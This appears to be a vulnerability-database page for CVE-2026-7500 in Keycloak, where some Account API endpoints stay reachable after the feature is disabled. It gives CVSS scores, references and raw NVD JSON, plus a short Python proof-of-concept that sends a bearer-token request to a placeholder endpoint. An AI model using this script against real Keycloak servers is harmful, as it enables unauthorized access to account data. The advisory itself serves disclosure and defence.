CVE-2026-7500

Description

When Keycloak is started with `--features-disabled=account,account-api`, the Account REST API is only partially disabled. Five endpoints under the versioned path `/account/v1alpha1` remain fully functional — including both read and write operations — because they lack the `checkAccountApiEnabled()` gate that correctly blocks four other endpoints in the same REST service class. The user needs to have permissions to use the API.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:-:*:*:* - VULNERABLE

Keycloak (具体受影响版本请参考官方安全通告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_host = "http://keycloak-target:8080"
realm = "master"
endpoint_path = "/realms/master/account/v1alpha1/some-exposed-endpoint" # The specific endpoint that lacks the check
url = f"{target_host}{endpoint_path}"

# Attacker requires a valid low-privilege access token
access_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

try:
    # Attempt to access the supposedly disabled API
    response = requests.get(url, headers=headers)
    
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed!")
        print("[+] Data retrieved from disabled endpoint:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7500
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7500
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7500/
[4] VulDB https://vuldb.com/cve/CVE-2026-7500
[5] https://access.redhat.com/security/cve/CVE-2026-7500
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2464126

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7500", "sourceIdentifier": "[email protected]", "published": "2026-04-30T15:16:23.673", "lastModified": "2026-05-05T03:00:08.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When Keycloak is started with `--features-disabled=account,account-api`, the Account REST API is only partially disabled. Five endpoints under the versioned path `/account/v1alpha1` remain fully functional — including both read and write operations — because they lack the `checkAccountApiEnabled()` gate that correctly blocks four other endpoints in the same REST service class. The user needs to have permissions to use the API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-425"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:-:*:*:*", "matchCriteriaId": "E5C930CB-4EAD-497B-A44B-D880F2A1F85B"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-7500", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2464126", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}